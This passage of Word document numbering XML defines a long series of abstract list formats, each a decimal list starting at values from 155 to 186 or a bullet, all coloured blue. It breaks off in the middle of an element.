  <w:abstractNum w:abstractNumId="21519">
    <w:lvl>
      <w:start w:val="155"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21520">
    <w:lvl>
      <w:start w:val="156"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21521">
    <w:lvl>
      <w:start w:val="157"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21522">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21523">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21524">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21525">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21526">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21527">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21528">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21529">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21530">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21531">
    <w:lvl>
      <w:start w:val="158"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21532">
    <w:lvl>
      <w:start w:val="159"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21533">
    <w:lvl>
      <w:start w:val="160"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21534">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21535">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21536">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21537">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21538">
    <w:lvl>
      <w:start w:val="161"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21539">
    <w:lvl>
      <w:start w:val="162"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21540">
    <w:lvl>
      <w:start w:val="163"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21541">
    <w:lvl>
      <w:start w:val="164"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21542">
    <w:lvl>
      <w:start w:val="165"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21543">
    <w:lvl>
      <w:start w:val="166"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21544">
    <w:lvl>
      <w:start w:val="167"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21545">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21546">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21547">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21548">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21549">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21550">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21551">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21552">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21553">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21554">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21555">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21556">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21557">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21558">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21559">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21560">
    <w:lvl>
      <w:start w:val="168"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21561">
    <w:lvl>
      <w:start w:val="169"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21562">
    <w:lvl>
      <w:start w:val="170"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21563">
    <w:lvl>
      <w:start w:val="171"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21564">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21565">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21566">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21567">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21568">
    <w:lvl>
      <w:start w:val="172"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21569">
    <w:lvl>
      <w:start w:val="173"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21570">
    <w:lvl>
      <w:start w:val="174"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21571">
    <w:lvl>
      <w:start w:val="175"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21572">
    <w:lvl>
      <w:start w:val="176"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21573">
    <w:lvl>
      <w:start w:val="177"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21574">
    <w:lvl>
      <w:start w:val="178"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21575">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21576">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21577">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21578">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21579">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21580">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21581">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21582">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21583">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21584">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21585">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21586">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21587">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21588">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21589">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21590">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21591">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21592">
    <w:lvl>
      <w:start w:val="179"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21593">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21594">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21595">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21596">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21597">
    <w:lvl>
      <w:start w:val="180"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21598">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21599">
    <w:lvl>
      <w:start w:val="181"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21600">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21601">
    <w:lvl>
      <w:start w:val="182"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21602">
    <w:lvl>
      <w:start w:val="183"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21603">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21604">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21605">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21606">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21607">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21608">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21609">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21610">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21611">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21612">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21613">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21614">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21615">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21616">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21617">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21618">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21619">
    <w:lvl>
      <w:start w:val="184"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21620">
    <w:lvl>
      <w:start w:val="185"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21621">
    <w:lvl>
      <w:start w:val="186"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="%1."/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21622">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21623">
    <w:lvl>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:rPr>
        <w:color w:val="3370ff"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="21624">
